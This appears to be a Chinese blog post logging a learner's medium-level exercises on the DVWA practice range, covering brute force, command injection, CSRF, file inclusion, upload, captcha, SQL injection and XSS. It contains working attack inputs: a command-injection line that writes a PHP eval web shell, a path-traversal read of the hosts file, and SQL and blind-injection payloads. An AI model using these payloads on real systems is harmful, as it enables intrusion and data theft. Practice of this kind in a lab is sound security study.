靶场练习-DVWA-MED

暴力破解-见了鬼了,中级的反而是get请求而且没有token,直接Top100。看到有一个不一样的返回长度值,返回到重发器测一下,通过;

命令执行-还是192.168.3.1|dir,看到回显目录C:\phpStudy\PHPTutorial\WWW\DVWA\vulnerabilities\exec,然后对比URL构造一个php文件192.168.3.1|echo " <?php eval($_POST['soc']);?> " > C:\phpStudy\PHPTutorial\WWW\DVWA\2.php,链接蚁剑成功;

跨站请求伪造-抓包发现有个referer字段,百度一下referer绕过和伪造;之前是我太钻牛角尖,想着在页面中伪造,经过老师点拨,原来可以二次伪造信息;

文件包含-还是看到4.php,然后尝试http://192.168.3.130/DVWA/vulnerabilities/fi/?page=C:\WINDOWS\system32\drivers\etc\hosts;
文件上传-上传发现对文件格式有要求,抓包发现还有大小要求;尝试改名上传,直接过了没有报错;然后尝试抓包在包里改名重发,也能过,连接成功;

不安全的验证码-继续懵逼中…看看前端代码,嗯,还是看到隐藏的表单,还有google的js,嗯,看不懂;还是先从隐藏表单下手,改数值,发包,没效果。。。;看看后台代码,先用之前的命令执行漏洞把copy源代码文件到同级目录下的1.txt,打开查看;发现实际页面代码另有一份medium.php(应该是根据等级选的),于是再来复制一遍;看到代码中有一段php写进去的,在验证码生效以后才会出现的参数passed_captcha,直接添加到数据包,发送,过;

SQL注入-POST请求1 or 1=1–+

SQL盲注-抓包提示1有数据,改为6提示没有数据;1 and 1=1–+没问题,还是一个一个猜id=1 and length(database())>4#报错,说明数据库四个字符,盲猜是dvwa,id=1 and ascii(substr(database(),1,1))=100#正确,后面估计没问题;

Session会话漏洞-和之前差不多,但是多了一个项目,看起来像个时间戳,在线转换工具确实是;

XSSdom-试了半天,对</和

XSS反射-也是过滤了,继续1234

XSS存储-还是过滤了,继续1234

绕过内容安全策略(CSP)-不会,等以后再做

前端攻击-嗯…也不会,看了答案决定暂时告一段落,开始做别的靶场,等水平上去了再继续做。

HIGH-暂时搁置,做更基础的,水平不够

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值